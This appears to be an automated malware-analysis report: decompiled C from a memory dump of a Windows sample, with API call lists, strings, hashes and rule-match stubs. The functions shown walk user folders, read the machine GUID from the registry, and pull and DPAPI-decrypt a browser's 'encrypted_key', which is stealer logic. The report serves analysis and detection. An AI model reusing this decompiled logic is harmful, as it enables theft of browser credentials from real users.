				_t319 = _t267;
				_t354 = _t267 - _t199;
				if(_t267 != _t199) {
					do {
						_v2028 = 7;
						_v2032 = 0;
						_v2048 = 0;
						E004122B0( &_v2048, _t319, 0, 0xffffffff);
						_v8 = 2;
						_t238 = E004238C0( &_v2217,  &_v2216,  &_v2048);
						_t311 =  *0x453748; // 0x25c6b88
						_v8 = 3;
						_t240 = E0040D100(_t354,  &_v2132,  &_v2188, _t311);
						_v8 = 4;
						_t336 = E00404E00( &_v2132,  &_v2104, _t240, _t238);
						_v8 = 5;
						_t243 = E004238C0( &_v2217,  &_v2160,  &_v2048);
						_t313 =  *0x453594; // 0x25c6bd8
						_v8 = 6;
						_t245 = E00404DB0( &_v2217,  &_v2076, _t313, _t243);
						_t352 = _t345 + 0x24;
						_v8 = 7;
						if( *((intOrPtr*)(_t336 + 0x14)) >= 0x10) {
							_t336 =  *_t336;
						}
						if( *((intOrPtr*)(_t245 + 0x14)) >= 0x10) {
							_t245 =  *_t245;
						}
						E004295D0( *((intOrPtr*)(_v2244 + 0x20)), _t245, _t336); // executed
						_t345 = _t352 + 0xc;
						if(_v2056 >= 0x10) {
							_push(_v2076);
							E0042A289();
							_t345 = _t345 + 4;
						}
						_v2056 = 0xf;
						_v2060 = 0;
						_v2076 = 0;
						if(_v2140 >= 0x10) {
							_push(_v2160);
							E0042A289();
							_t345 = _t345 + 4;
						}
						_v2140 = 0xf;
						_v2144 = 0;
						_v2160 = 0;
						if(_v2084 >= 0x10) {
							_push(_v2104);
							E0042A289();
							_t345 = _t345 + 4;
						}
						_v2084 = 0xf;
						_v2088 = 0;
						_v2104 = 0;
						if(_v2112 >= 0x10) {
							_push(_v2132);
							E0042A289();
							_t345 = _t345 + 4;
						}
						_v2112 = 0xf;
						_v2116 = 0;
						_v2132 = 0;
						if(_v2196 >= 0x10) {
							_push(_v2216);
							E0042A289();
							_t345 = _t345 + 4;
						}
						_v8 = 1;
						if(_v2028 >= 8) {
							_push(_v2048);
							E0042A289();
							_t345 = _t345 + 4;
						}
						_t319 = _t319 + 0x1c;
						_t363 = _t319 - _v2224;
					} while (_t319 != _v2224);
				}
				_t346 = _t345 - 0x1c;
				_t327 = _t346;
				_v2224 = _t346;
				 *((intOrPtr*)(_t327 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t327 + 0x10)) = 0;
				 *_t327 = 0;
				_t201 = E0042BC70( &_v2020);
				_t347 = _t346 + 4;
				E00404BC0(_t327,  &_v2020, _t201);
				_t304 =  &_v2036;
				_push( &_v2036);
				_t203 = E00424100( &_v2217, _t363); // executed
				_t328 = _t203;
				if( &_v2240 != _t328) {
					_t232 = _v2240;
					if(_v2240 != 0) {
						_push(_v2224);
						_push( &_v2228);
						E004123E0(_t232, _v2236);
						_push(_v2240);
						E0042A289();
						_t347 = _t347 + 0x14;
					}
					_v2240 = 0;
					_v2236 = 0;
					_v2232 = 0;
					_v2240 =  *_t328;
					_v2236 =  *((intOrPtr*)(_t328 + 4));
					_t304 =  *((intOrPtr*)(_t328 + 8));
					_v2232 =  *((intOrPtr*)(_t328 + 8));
					 *_t328 = 0;
					 *((intOrPtr*)(_t328 + 4)) = 0;
					 *((intOrPtr*)(_t328 + 8)) = 0;
				}
				_t329 = _v2036;
				_v8 = 1;
				if(_t329 != 0) {
					_t323 = _v2032;
					if(_t329 != _t323) {
						do {
							if( *((intOrPtr*)(_t329 + 0x14)) >= 8) {
								_push( *_t329);
								E0042A289();
								_t347 = _t347 + 4;
							}
							 *((intOrPtr*)(_t329 + 0x14)) = 7;
							 *((intOrPtr*)(_t329 + 0x10)) = 0;
							 *_t329 = 0;
							_t329 = _t329 + 0x1c;
						} while (_t329 != _t323);
						_t329 = _v2036;
					}
					_push(_t329);
					E0042A289();
					_t347 = _t347 + 4;
				}
				_t205 = _v2236;
				_t330 = _v2240;
				_v2224 = _t205;
				_t320 = _t330;
				_t370 = _t330 - _t205;
				if(_t330 != _t205) {
					do {
						_v2048 = 0;
						_v2028 = 7;
						_v2032 = 0;
						E004122B0( &_v2048, _t320, 0, 0xffffffff);
						_v8 = 9;
						_t211 = E004238C0( &_v2217,  &_v2216,  &_v2048);
						_t279 =  *0x4538dc; // 0x25c8458
						_v8 = 0xa;
						_t213 = E0040D100(_t370,  &_v2076,  &_v2188, _t279);
						_v8 = 0xb;
						_t333 = E00404E00( &_v2160,  &_v2160, _t213, _t211);
						_v8 = 0xc;
						_t216 = E004238C0( &_v2217,  &_v2104,  &_v2048);
						_t282 =  *0x453608; // 0x25c9a68
						_t304 =  &_v2132;
						_v8 = 0xd;
						_t217 = E00404DB0(_t282,  &_v2132, _t282, _t216);
						_t350 = _t347 + 0x24;
						_v8 = 0xe;
						if( *((intOrPtr*)(_t333 + 0x14)) >= 0x10) {
							_t333 =  *_t333;
						}
						if( *((intOrPtr*)(_t217 + 0x14)) >= 0x10) {
							_t217 =  *_t217;
						}
						E004295D0( *((intOrPtr*)(_v2244 + 0x20)), _t217, _t333); // executed
						_t347 = _t350 + 0xc;
						if(_v2112 >= 0x10) {
							_t304 = _v2132;
							_push(_v2132);
							E0042A289();
							_t347 = _t347 + 4;
						}
						_v2112 = 0xf;
						_v2116 = 0;
						_v2132 = 0;
						if(_v2084 >= 0x10) {
							_push(_v2104);
							E0042A289();
							_t347 = _t347 + 4;
						}
						_v2084 = 0xf;
						_v2088 = 0;
						_v2104 = 0;
						if(_v2140 >= 0x10) {
							_push(_v2160);
							E0042A289();
							_t347 = _t347 + 4;
						}
						_v2140 = 0xf;
						_v2144 = 0;
						_v2160 = 0;
						if(_v2056 >= 0x10) {
							_t304 = _v2076;
							_push(_v2076);
							E0042A289();
							_t347 = _t347 + 4;
						}
						_v2056 = 0xf;
						_v2060 = 0;
						_v2076 = 0;
						if(_v2196 >= 0x10) {
							_push(_v2216);
							E0042A289();
							_t347 = _t347 + 4;
						}
						_v8 = 1;
						if(_v2028 >= 8) {
							_push(_v2048);
							E0042A289();
							_t347 = _t347 + 4;
						}
						_t320 = _t320 + 0x1c;
					} while (_t320 != _v2224);
					_t205 = _v2236;
					_t330 = _v2240;
				}
				if(_t330 != 0) {
					_t322 = _t205;
					if(_t330 != _t205) {
						do {
							if( *((intOrPtr*)(_t330 + 0x14)) >= 8) {
								_t304 =  *_t330;
								_push( *_t330);
								E0042A289();
								_t347 = _t347 + 4;
							}
							 *((intOrPtr*)(_t330 + 0x14)) = 7;
							 *((intOrPtr*)(_t330 + 0x10)) = 0;
							 *_t330 = 0;
							_t330 = _t330 + 0x1c;
						} while (_t330 != _t322);
						_t330 = _v2240;
					}
					_push(_t330);
					_t205 = E0042A289();
					_t347 = _t347 + 4;
				}
				_v2240 = 0;
				_v2236 = 0;
				_v2232 = 0;
				if(_v2168 >= 0x10) {
					_push(_v2188);
					_t205 = E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t321);
				_pop(_t331);
				_pop(_t257);
				return E0042A36A(_t205, _t257, _v20 ^ _t338, _t304, _t321, _t331);
			}

0x0041d5f0
0x0041d607
0x0041d60c
0x0041d60e
0x0041d618
0x0041d620
0x0041d62b
0x0041d635
0x0041d63b
0x0041d641
0x0041d657
0x0041d669
0x0041d66c
0x0041d67e
0x0041d695
0x0041d69b
0x0041d6a8
0x0041d6ae
0x0041d6bc
0x0041d6c4
0x0041d6d4
0x0041d6da
0x0041d6e8
0x0041d6fa
0x0041d700
0x0041d703
0x0041d70b
0x0041d711
0x0041d714
0x0041d718
0x0041d71a
0x0041d71f
0x0041d72c
0x0041d73e
0x0041d743
0x0041d749
0x0041d74f
0x0041d753
0x0041d759
0x0041d75b
0x0041d75d
0x0041d763
0x0041d76f
0x0041d779
0x0041d77f
0x0041d786
0x0041d79f
0x0041d7a3
0x0041d7aa
0x0041d7bf
0x0041d7c3
0x0041d7d1
0x0041d7dd
0x0041d7f3
0x0041d7f7
0x0041d7fc
0x0041d80b
0x0041d80f
0x0041d814
0x0041d81c
0x0041d823
0x0041d825
0x0041d825
0x0041d82a
0x0041d82c
0x0041d82c
0x0041d83a
0x0041d844
0x0041d84d
0x0041d855
0x0041d856
0x0041d85b
0x0041d85b
0x0041d85e
0x0041d868
0x0041d86e
0x0041d87a
0x0041d882
0x0041d883
0x0041d888
0x0041d888
0x0041d88b
0x0041d895
0x0041d89b
0x0041d8a7
0x0041d8af
0x0041d8b0
0x0041d8b5
0x0041d8b5
0x0041d8b8
0x0041d8c2
0x0041d8c8
0x0041d8d4
0x0041d8dc
0x0041d8dd
0x0041d8e2
0x0041d8e2
0x0041d8e5
0x0041d8ef
0x0041d8f5
0x0041d901
0x0041d909
0x0041d90a
0x0041d90f
0x0041d90f
0x0041d919
0x0041d91d
0x0041d925
0x0041d926
0x0041d92b
0x0041d92b
0x0041d92e
0x0041d931
0x0041d931
0x0041d763
0x0041d93d
0x0041d940
0x0041d948
0x0041d94e
0x0041d955
0x0041d959
0x0041d95b
0x0041d960
0x0041d96d
0x0041d972
0x0041d978
0x0041d97f
0x0041d984
0x0041d98e
0x0041d990
0x0041d998
0x0041d9a0
0x0041d9ad
0x0041d9b0
0x0041d9bb
0x0041d9bc
0x0041d9c1
0x0041d9c1
0x0041d9c4
0x0041d9ca
0x0041d9d0
0x0041d9d8
0x0041d9e1
0x0041d9e7
0x0041d9ea
0x0041d9f0
0x0041d9f2
0x0041d9f5
0x0041d9f5
0x0041d9f8
0x0041d9fe
0x0041da04
0x0041da06
0x0041da0e
0x0041da10
0x0041da14
0x0041da18
0x0041da19
0x0041da1e
0x0041da1e
0x0041da23
0x0041da2a
0x0041da2d
0x0041da30
0x0041da33
0x0041da37
0x0041da37
0x0041da3d
0x0041da3e
0x0041da43
0x0041da43
0x0041da46
0x0041da4c
0x0041da52
0x0041da58
0x0041da5a
0x0041da5c
0x0041da62
0x0041da67
0x0041da75
0x0041da7f
0x0041da85
0x0041da9e
0x0041daa2
0x0041daa9
0x0041dabe
0x0041dac2
0x0041dad0
0x0041dadc
0x0041daf2
0x0041daf6
0x0041dafb
0x0041db03
0x0041db0a
0x0041db0e
0x0041db13
0x0041db1b
0x0041db22
0x0041db24
0x0041db24
0x0041db29
0x0041db2b
0x0041db2b
0x0041db39
0x0041db43
0x0041db4c
0x0041db4e
0x0041db54
0x0041db55
0x0041db5a
0x0041db5a
0x0041db5d
0x0041db67
0x0041db6d
0x0041db79
0x0041db81
0x0041db82
0x0041db87
0x0041db87
0x0041db8a
0x0041db94
0x0041db9a
0x0041dba6
0x0041dbae
0x0041dbaf
0x0041dbb4
0x0041dbb4
0x0041dbb7
0x0041dbc1
0x0041dbc7
0x0041dbd3
0x0041dbd5
0x0041dbdb
0x0041dbdc
0x0041dbe1
0x0041dbe1
0x0041dbe4
0x0041dbee
0x0041dbf4
0x0041dc00
0x0041dc08
0x0041dc09
0x0041dc0e
0x0041dc0e
0x0041dc18
0x0041dc1c
0x0041dc24
0x0041dc25
0x0041dc2a
0x0041dc2a
0x0041dc2d
0x0041dc30
0x0041dc3c
0x0041dc42
0x0041dc42
0x0041dc4a
0x0041dc4c
0x0041dc50
0x0041dc52
0x0041dc56
0x0041dc58
0x0041dc5a
0x0041dc5b
0x0041dc60
0x0041dc60
0x0041dc65
0x0041dc6c
0x0041dc6f
0x0041dc72
0x0041dc75
0x0041dc79
0x0041dc79
0x0041dc7f
0x0041dc80
0x0041dc85
0x0041dc85
0x0041dc8f
0x0041dc95
0x0041dc9b
0x0041dca1
0x0041dca9
0x0041dcaa
0x0041dcaf
0x0041dcb5
0x0041dcbd
0x0041dcbe
0x0041dcbf
0x0041dccd

APIs

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

_strlen.LIBCMT ref: 0041D647
_memset.LIBCMT ref: 0041D66C
_memset.LIBCMT ref: 0041D67E
lstrcat.KERNEL32(?,00000000), ref: 0041D695
lstrcat.KERNEL32(?,025C6B88), ref: 0041D6A8
lstrcat.KERNEL32(?,025C9CE8), ref: 0041D6BC
lstrcat.KERNEL32(?,00000000), ref: 0041D6D4
lstrcat.KERNEL32(?,025C8458), ref: 0041D6E8
lstrcat.KERNEL32(?,004465B0), ref: 0041D6FA
_strlen.LIBCMT ref: 0041D71A

Part of subcall function 00424100: FindFirstFileW.KERNEL32(00000000,?,?,?,C21D6F0A,0000000F,?,00000000), ref: 00424167
Part of subcall function 00424100: _wcslen.LIBCMT ref: 004241BA
Part of subcall function 00424100: FindNextFileW.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00424205
Part of subcall function 00424100: _wcslen.LIBCMT ref: 00424223

_strlen.LIBCMT ref: 0041D95B

Part of subcall function 004122B0: std::_Xinvalid_argument.LIBCPMT ref: 004122CA

Part of subcall function 004238C0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000010,00000000,?,?,0041F816,?,?), ref: 004238F2
Part of subcall function 004238C0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0042391C
Part of subcall function 004238C0: _strlen.LIBCMT ref: 00423937

Part of subcall function 0040D100: _strlen.LIBCMT ref: 0040D14E
Part of subcall function 0040D100: _strlen.LIBCMT ref: 0040D195

Part of subcall function 00404DB0: _strlen.LIBCMT ref: 00404DC0

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$lstrcat$_memset$ByteCharFileFindMultiWide_wcslen$FirstFolderNextPathXinvalid_argumentstd::_
String ID:
API String ID: 3075304852-0
Opcode ID: d4b27e8bcbcfbffe6257923257a1ddf49e79b8903e1e1a73dc74af9c3b2e0de8
Instruction ID: 61f7c9f054202f7dadfe26d416006e177908af966cea15e5eff900a0bdc1b562
Opcode Fuzzy Hash: d4b27e8bcbcfbffe6257923257a1ddf49e79b8903e1e1a73dc74af9c3b2e0de8
Instruction Fuzzy Hash: 34125EB1D00268DBDB21EF55DC41ADAB7F8BB45304F0485EEE48963241DB786A84CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041F5C0(void* __ebx, void* __edi, char* _a4) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				int _v524;
				void* _v528;
				void* __esi;
				signed int _t19;
				long _t23;
				void* _t34;
				void* _t44;
				char* _t45;
				signed int _t46;

				_t44 = __edi;
				_t34 = __ebx;
				_t19 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t19 ^ _t46;
				_t45 = _a4;
				_v524 = 0;
				_v524 = 0xff;
				_v264 = 0;
				E0042A2F0( &_v263, 0, 0xfe);
				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v528); // executed
				if(_t23 == 0) {
					RegQueryValueExA(_v528, "MachineGuid", 0, 0,  &_v264,  &_v524); // executed
				}
				RegCloseKey(_v528);
				CharToOemA( &_v264,  &_v520);
				 *((intOrPtr*)(_t45 + 0x14)) = 0xf;
				 *(_t45 + 0x10) = 0;
				 *_t45 = 0;
				E00404BC0(_t45,  &_v520, E0042BC70( &_v520));
				return E0042A36A(_t45, _t34, _v8 ^ _t46,  &_v520, _t44, _t45);
			}

0x0041f5c0
0x0041f5c0
0x0041f5c9
0x0041f5d0
0x0041f5d4
0x0041f5e2
0x0041f5ef
0x0041f5f9
0x0041f600
0x0041f620
0x0041f628
0x0041f648
0x0041f648
0x0041f655
0x0041f669
0x0041f675
0x0041f67c
0x0041f684
0x0041f699
0x0041f6ae

APIs

_memset.LIBCMT ref: 0041F600
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0041F620
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF,?,?,00000000), ref: 0041F648
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0041F655
CharToOemA.USER32(00000000,?), ref: 0041F669
_strlen.LIBCMT ref: 0041F687

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0041F616
MachineGuid, xrefs: 0041F642

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset_strlen
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 3724188811-1211650757
Opcode ID: 9eab6caa94e20718e137a9bcbb9cf91c1f448224d01203fa9f325dfc99fed9e8
Instruction ID: 416a924afcc3b27f78d42cb6ce801221d2798d80f392a2e2b9ce9dff6ceabd4c
Opcode Fuzzy Hash: 9eab6caa94e20718e137a9bcbb9cf91c1f448224d01203fa9f325dfc99fed9e8
Instruction Fuzzy Hash: E721DBF560031DABDB20EF50DC49FDAB3B8EB54704F1041EDE615A7182EBB46A848F95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E720 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168
stringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040E720(void* __eflags, intOrPtr _a4, char _a8, char _a24, intOrPtr _a28, char _a36, intOrPtr _a56, intOrPtr _a64) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v32;
				char _v48;
				intOrPtr _v56;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t61;
				void* _t69;
				char* _t71;
				void* _t73;
				char* _t75;
				char* _t78;
				void* _t81;
				char* _t84;
				void* _t85;
				void* _t89;
				char* _t91;
				void* _t105;
				void* _t107;
				char* _t109;
				void* _t111;
				signed int _t112;
				void* _t113;
				char* _t115;
				char* _t117;
				void* _t118;
				void* _t119;
				void* _t121;

				_t121 = __eflags;
				_push(0xffffffff);
				_push(E0043E458);
				_push( *[fs:0x0]);
				_t60 =  *0x451f00; // 0xc21d6f0a
				_t61 = _t60 ^ _t112;
				_v20 = _t61;
				_push(_t61);
				 *[fs:0x0] =  &_v16;
				_v80 = _a64;
				_v8 = 0;
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				_t115 = _t113 - 0x30;
				_t109 = _t115;
				_v84 = 0;
				_v88 = _t115;
				 *((intOrPtr*)(_t109 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t109 + 0x10)) = 0;
				_v8 = 2;
				_t105 = 0;
				 *_t109 = 0;
				E00404BC0(_t109, 0x443c1c, E0042BC70(0x443c1c));
				_push(1);
				_t117 = _t115 + 4 - 0x1c;
				_t91 = _t117;
				_v92 = _t117;
				_t103 =  &_a36;
				 *((intOrPtr*)(_t91 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t91 + 0x10)) = 0;
				_v8 = 3;
				 *_t91 = 0;
				E00404AD0(_t91,  &_a36, 0, 0xffffffff);
				_push( &_v76);
				_v8 = 2;
				_t69 = E0040D960(_t121); // executed
				_t118 = _t117 + 0x40;
				_v8 = 4;
				E00404D00( &_v48, _t69);
				_v8 = 2;
				if(_v56 >= 0x10) {
					_push(_v76);
					E0042A289();
					_t118 = _t118 + 4;
				}
				_t71 = _v48;
				if(_v28 < 0x10) {
					_t71 =  &_v48;
				}
				_push("ERROR");
				_push(_t71);
				if( *0x464890() == 0) {
					L13:
					_t73 = E0042BC70("ERROR");
					_t119 = _t118 + 4;
					_push(_t73);
					_push("ERROR");
				} else {
					_t78 = _a8;
					if(_a28 < 0x10) {
						_t78 =  &_a8;
					}
					_t103 = _a24;
					if(E0040A2A0( &_v48, _t78, 0, _a24) != 0xffffffff) {
						E00404410( &_v48, 0, _t79 + _a4);
						_t84 = _v48;
						if(_v28 < 0x10) {
							_t84 =  &_v48;
						}
						_t103 =  &_v84;
						_t85 = E0042CE7D(0,  &_v84, _t105, _t84, _v80,  &_v84);
						_t118 = _t118 + 0xc;
						_t105 = _t85;
					}
					_push(_t105);
					if( *0x464758() < 1) {
						goto L13;
					} else {
						_t81 = E0042BC70(_t105);
						_t119 = _t118 + 4;
						_push(_t81);
						_push(_t105);
					}
				}
				E00404BC0(0x451844);
				_t75 = _v48;
				_v32 = 0;
				if(_v28 < 0x10) {
					_t75 =  &_v48;
				}
				 *_t75 = 0;
				if(_v28 >= 0x10) {
					_t103 = _v48;
					_push(_v48);
					_t75 = E0042A289();
					_t119 = _t119 + 4;
				}
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				if(_a28 >= 0x10) {
					_push(_a8);
					_t75 = E0042A289();
					_t119 = _t119 + 4;
				}
				_a28 = 0xf;
				_a24 = 0;
				_a8 = 0;
				if(_a56 >= 0x10) {
					_push(_a36);
					_t75 = E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t107);
				_pop(_t111);
				_pop(_t89);
				return E0042A36A(_t75, _t89, _v20 ^ _t112, _t103, _t107, _t111);
			}

0x0040e720
0x0040e723
0x0040e725
0x0040e730
0x0040e734
0x0040e739
0x0040e73b
0x0040e741
0x0040e745
0x0040e74e
0x0040e753
0x0040e75b
0x0040e75e
0x0040e761
0x0040e764
0x0040e767
0x0040e769
0x0040e76c
0x0040e76f
0x0040e772
0x0040e77a
0x0040e77e
0x0040e780
0x0040e792
0x0040e797
0x0040e799
0x0040e79c
0x0040e79e
0x0040e7a4
0x0040e7a7
0x0040e7ae
0x0040e7b2
0x0040e7b6
0x0040e7b8
0x0040e7c0
0x0040e7c1
0x0040e7c5
0x0040e7ca
0x0040e7d1
0x0040e7d5
0x0040e7df
0x0040e7e6
0x0040e7eb
0x0040e7ec
0x0040e7f1
0x0040e7f1
0x0040e7f4
0x0040e7fa
0x0040e7fc
0x0040e7fc
0x0040e7ff
0x0040e804
0x0040e80d
0x0040e871
0x0040e876
0x0040e87b
0x0040e87e
0x0040e87f
0x0040e80f
0x0040e80f
0x0040e815
0x0040e817
0x0040e817
0x0040e81a
0x0040e82b
0x0040e835
0x0040e83a
0x0040e840
0x0040e842
0x0040e842
0x0040e848
0x0040e84e
0x0040e853
0x0040e856
0x0040e856
0x0040e858
0x0040e862
0x00000000
0x0040e864
0x0040e865
0x0040e86a
0x0040e86d
0x0040e86e
0x0040e86e
0x0040e862
0x0040e889
0x0040e88e
0x0040e891
0x0040e897
0x0040e899
0x0040e899
0x0040e89c
0x0040e8a1
0x0040e8a3
0x0040e8a6
0x0040e8a7
0x0040e8ac
0x0040e8ac
0x0040e8b4
0x0040e8b7
0x0040e8ba
0x0040e8c0
0x0040e8c5
0x0040e8c6
0x0040e8cb
0x0040e8cb
0x0040e8ce
0x0040e8d1
0x0040e8d4
0x0040e8da
0x0040e8df
0x0040e8e0
0x0040e8e5
0x0040e8eb
0x0040e8f3
0x0040e8f4
0x0040e8f5
0x0040e903

APIs

_strlen.LIBCMT ref: 0040E782

Part of subcall function 00404AD0: std::_Xinvalid_argument.LIBCPMT ref: 00404AEA

Part of subcall function 0040D960: _memset.LIBCMT ref: 0040D9B3
Part of subcall function 0040D960: _memset.LIBCMT ref: 0040D9C5
Part of subcall function 0040D960: _strlen.LIBCMT ref: 0040D9E7
Part of subcall function 0040D960: _strlen.LIBCMT ref: 0040DAC0
Part of subcall function 0040D960: _memcmp.LIBCMT ref: 0040DAFF

Part of subcall function 00404D00: _memmove.LIBCMT ref: 00404D3D

StrCmpCA.SHLWAPI(?,ERROR,00000000), ref: 0040E805
_strtok_s.LIBCMT ref: 0040E84E
lstrlen.KERNEL32(00000000), ref: 0040E859
_strlen.LIBCMT ref: 0040E865
_strlen.LIBCMT ref: 0040E876

Strings

ERROR, xrefs: 0040E7FF, 0040E871, 0040E87F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$_memset$Xinvalid_argument_memcmp_memmove_strtok_slstrlenstd::_
String ID: ERROR
API String ID: 2297132100-2861137601
Opcode ID: 6371947d1895b7145f33f6dd278a2c13aeeadf24568e1a54cd97a42b53315f24
Instruction ID: cd9c47a784a09eb7a5a7e91f7bd37583dc6f5288d296f815f8daa746e1df752b
Opcode Fuzzy Hash: 6371947d1895b7145f33f6dd278a2c13aeeadf24568e1a54cd97a42b53315f24
Instruction Fuzzy Hash: 335185B1D00248EFDB00DFA6D841AEEBBB8EF45714F14857EF81577281D77895048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004199D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004199D0(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				void* _v32;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* __ebx;
				void* __esi;
				signed int _t38;
				signed int _t39;
				void* _t42;
				char* _t46;
				char* _t52;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t62;
				void* _t63;
				void* _t80;
				void* _t82;
				signed int _t87;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t94;

				_t80 = __edi;
				_push(0xffffffff);
				_push(E0043EEE8);
				_push( *[fs:0x0]);
				_t38 =  *0x451f00; // 0xc21d6f0a
				_t39 = _t38 ^ _t87;
				_v20 = _t39;
				_push(_t39);
				 *[fs:0x0] =  &_v16;
				_v68 = _a8;
				_v64 = _a12;
				_t79 =  &_v52;
				_t62 = 0; // executed
				_t42 = E00414F00(_a4,  &_v52,  &_v56); // executed
				_t90 = _t88 - 0x34 + 0xc;
				if(_t42 != 0) {
					_t46 = E004204D0(_v52, _v56); // executed
					_t91 = _t90 + 8;
					if(_t46 != 0) {
						StrStrA(_t46, "encrypted_key");
						if(_t47 != 0) {
							_t52 = _v48;
							if(_v28 < 0x10) {
								_t52 =  &_v48;
							}
							_t79 =  &_v60;
							_t53 = E00414FC0(_t52,  &_v52,  &_v60);
							_t94 = _t93 + 0xc;
							if(_t53 != 0 && _v60 >= 5) {
								_t85 = _v52;
								_t55 = E0042A379(_v52, "DPAPI", 5);
								_t94 = _t94 + 0xc;
								if(_t55 == 0) {
									_t79 =  &_v52;
									_t57 = E00415040(_t85 + 5, _v60 + 0xfffffffb,  &_v56,  &_v52); // executed
									_t94 = _t94 + 0x10;
									if(_t57 != 0 && _v52 == 0x20) {
										_t79 = _v64;
										_t62 = 1;
										E00415110(_v56, _v68, _v64);
										_t94 = _t94 + 0xc;
									}
								}
							}
							if(_v28 >= 0x10) {
								_t79 = _v48;
								_push(_v48);
								E0042A289();
							}
						}
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t82);
				_pop(_t63);
				return E0042A36A(_t62, _t63, _v20 ^ _t87, _t79, _t80, _t82);
			}

0x004199d0
0x004199d3
0x004199d5
0x004199e0
0x004199e4
0x004199e9
0x004199eb
0x004199f0
0x004199f4
0x00419a03
0x00419a09
0x00419a0d
0x00419a12
0x00419a14
0x00419a19
0x00419a1e
0x00419a2c
0x00419a31
0x00419a36
0x00419a48
0x00419a4c
0x00419aa8
0x00419aab
0x00419aad
0x00419aad
0x00419ab0
0x00419ab9
0x00419abe
0x00419ac3
0x00419acb
0x00419ad6
0x00419adb
0x00419ae0
0x00419ae5
0x00419af5
0x00419afa
0x00419aff
0x00419b07
0x00419b13
0x00419b18
0x00419b1d
0x00419b1d
0x00419aff
0x00419ae0
0x00419b24
0x00419b26
0x00419b29
0x00419b2a
0x00419b2f
0x00419b24
0x00419a4c
0x00419a36
0x00419b37
0x00419b3f
0x00419b40
0x00419b4e

APIs

Part of subcall function 00414F00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,C21D6F0A,?,00000000,?,0043EEE8,000000FF), ref: 00414F1A
Part of subcall function 00414F00: GetFileSizeEx.KERNEL32(00000000,?,?,0040AF01,?,?,?,00000000,?,?,?,00000000), ref: 00414F30
Part of subcall function 00414F00: LocalAlloc.KERNEL32(00000040,?,00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000), ref: 00414F4B
Part of subcall function 00414F00: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000), ref: 00414F64
Part of subcall function 00414F00: LocalFree.KERNEL32(00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000,?,?,?,?,C21D6F0A), ref: 00414F80
Part of subcall function 00414F00: CloseHandle.KERNEL32(00000000,?,0040AF01,?,?,?,00000000,?,?,?,00000000,?,?,?,?,C21D6F0A), ref: 00414F88

Part of subcall function 004204D0: LocalAlloc.KERNEL32(00000040,00419A32,?,00000000,00000000,?,00419A31,0043EEE8,?,C21D6F0A,?,00000000,?,0043EEE8,000000FF), ref: 004204EC

